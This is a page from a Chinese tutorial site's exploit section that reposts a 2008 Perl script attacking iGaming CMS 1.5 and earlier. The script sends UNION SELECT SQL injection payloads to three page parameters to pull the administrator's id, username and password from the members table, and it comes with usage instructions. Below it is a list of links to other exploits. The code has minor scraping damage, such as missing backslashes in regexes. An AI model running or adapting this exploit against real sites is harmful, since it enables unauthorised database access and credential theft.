手机
当前位置:查字典教程网 >网络安全 >Exploit >iGaming CMS
iGaming CMS
摘要:#!/usr/bin/perl#------------------------------------------------------...

#!/usr/bin/perl

# ----------------------------------------------------------

# iGaming <= 1.5 Multiple Remote SQL Injection Exploit

# Perl Exploit - Output: id:admin:password

# Discovered On: 23/09/2008

# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it

# Proud To Be Italian

# ----------------------------------------------------------

# Usage: perl exploit.pl http://localhost/iGaming

# ---------------------------------------------------------- use strict;

use LWP::UserAgent; my ($one,$two,$exec,$host,$http,$xxx,$view); $view = "' union select 0,0,1,2,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),0,6,7,8 from sp_members WHERE id='1/*";

$exec = "' union select 1,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),3 from sp_members where id='1/*";

$host = shift @ARGV;

$http = new LWP::UserAgent or die $!;

$http->agent("Mozilla/4.5 [en] (Win95; U)");

$http->timeout(1);

if($host !~ /^http://(. ?)$/)

{

print "[?] iGaming CMS <= 1.5 Multiple Remote SQL Injection Exploitn";

print "[?] Usage: perl $0 http://[path]n";

exit;

}

else

{

$one = $http->get($host.'/previews.php?browse='.$exec);

$two = $http->get($host.'/reviews.php?browse='.$exec);

$xxx = $http->get($host.'/index.php?do=viewarticle&id='.$view);

if($one->is_success or $two->is_success or $xxx->is_success)

{

die "$1n" if $one->content =~ /%(. ?)%/;

die "$1n" if $two->content =~ /%(. ?)%/;

die "$1n" if $xxx->content =~ /%(. ?)%/;

}

else

{

die "[ ] Exploit Failed!n";

}

}

【iGaming CMS】相关文章:

Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit

Dana IRC 1.4a Remote Buffer Overflow Exploit

Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

Joomla Component n-forms 1.01 Blind SQL Injection Exploit

Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)

ESET Smart Security 3.0.667.0 Privilege Escalation PoC

Maian Guestbook

Linux Kernel

BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (spoof on ircd)

TGS CMS 0.3.2r2 Remote Code Execution Exploit

精品推荐
分类导航